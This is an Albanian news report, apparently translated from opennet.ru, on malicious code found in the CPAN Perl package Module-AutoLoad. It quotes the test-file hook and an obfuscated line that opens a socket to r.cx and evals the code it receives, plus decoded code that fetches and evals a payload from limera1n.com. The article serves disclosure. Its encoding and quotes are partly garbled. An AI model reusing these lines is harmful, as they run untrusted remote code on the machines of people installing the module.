Në paketën Perl Module-AutoLoad është zbuluar kod i dëmshëm

Në paketën Perl të shpërndarë përmes katalagut CPAN Module-AutoLoad, e cila është e destinuar për ngarkimin automatik të moduleve CPAN në fluturim, u identifikua kod i dëmshëm. Injektimi i dëmshëm u gjet në kodin e testit 05_rcx.t, i cili është ofruar që nga viti 2011.
ËshtĂ« e rĂ«ndĂ«sishme tĂ« theksohet se pyetjet pĂ«r ngarkimin e kodit tĂ« dyshimtĂ« kanĂ« lindur qĂ« Stackoverflow nĂ« vitin 2016.

Aktiviteti i dëmshëm reduktohet në përpjekjen për të ngarkuar dhe ekzekutuar kod nga një server i jashtëm (http://r.cx:1/) gjatë ekzekutimit të paketës së testeve, e cila ekzekutohet gjatë instalimit të modulit. Supozohet se kodi fillimisht i ngarkuar nga serveri i jashtëm nuk ishte i dëmshëm, por tani kërkesa redirektohet në domenin ww.limera1n.com, i cili ofron pjesën e tij të kodit për ekzekutim.

Për të organizuar ngarkimin, në skedarin 05_rcx.t përdoret kodi në vijim:

my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

Kodi i dhënë çon në ekzekutimin e skriptit ../contrib/RCX.pl, përmbajtja e të cilit reduktohet në rreshtin:

use lib do{eval&&botstrap(«RCX»)if$b=new IO::Socket::INET 82.46.99.88.»:1″};

Ky skript ngarkon ngatërruar me ndihmën e shërbimit perlobfuscator.com kod nga hosti i jashtëm r.cx (kodet e simbolit 82.46.99.88 i korrespondon tekstit «R.cX») dhe e ekzekuton atë në bllokun eval.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.»:1″; print ;'
eval unpack u=>q{_<'I;G1[)&(];F5W($E/.CI3;V-K970Z.DE
.}

Pas dekompresimit, në fund ekzekutohet si vijon kod:

print{$b=new IO::Socket::INET»ww.limera1n.com:80″}»GET /iJailBreak
«;evalor return warn$@while$b;1

Aktualisht paketa problematike është fshirë nga depoja PAUSE (Perl Authors Upload Server), ndërsa llogaria e autorit të modulit është bllokuar. Megjithatë, moduli ende mbetet disponibel në arkiv të MetaCPAN dhe mund të instalohet drejtpërdrejt nga MetaCPAN me ndihmën e disa mjeteve, të tilla si cpanminus. Vërehet, që paketa nuk është shpërndarë gjerësisht.

ËshtĂ« interesante se nĂ« diskutim u bashkua dhe autori i modulit, i cili hodhi poshtĂ« informacionin se kodi keqbĂ«rĂ«s ishte futur pas hackimit tĂ« faqes sĂ« tij "r.cx" dhe shpjegoi se ai thjesht po argĂ«tohej, dhe perlobfuscator.com nuk u pĂ«rdor pĂ«r tĂ« fshehur diçka, por pĂ«r tĂ« reduktuar madhĂ«sinĂ« e kodit dhe pĂ«r tĂ« lehtĂ«suar kopjimin e tij pĂ«rmes clipboard-it. Zgjedhja e emrit tĂ« funksionit "botstrap" Ă«shtĂ« shpjeguar si rezultat i faktit se kjo fjalĂ« "tingĂ«llon si bot dhe Ă«shtĂ« mĂ« e shkurtĂ«r se bootstrap". Autori i modulit gjithashtu e siguroi se manipulimet e identifikuara nuk kryejnĂ« veprime keqbĂ«rĂ«se, por thjesht demonstrojnĂ« ngarkimin dhe ekzekutimin e kodit pĂ«rmes TCP.

Burimi: opennet.ru

Bli njĂ« hosting tĂ« besueshĂ«m pĂ«r faqet me mbrojtje DDoS, VPS VDS serverĂ« đŸ”„ Bli njĂ« hosting tĂ« besueshĂ«m pĂ«r faqet me mbrojtje DDoS, VPS VDS serverĂ« | ProHoster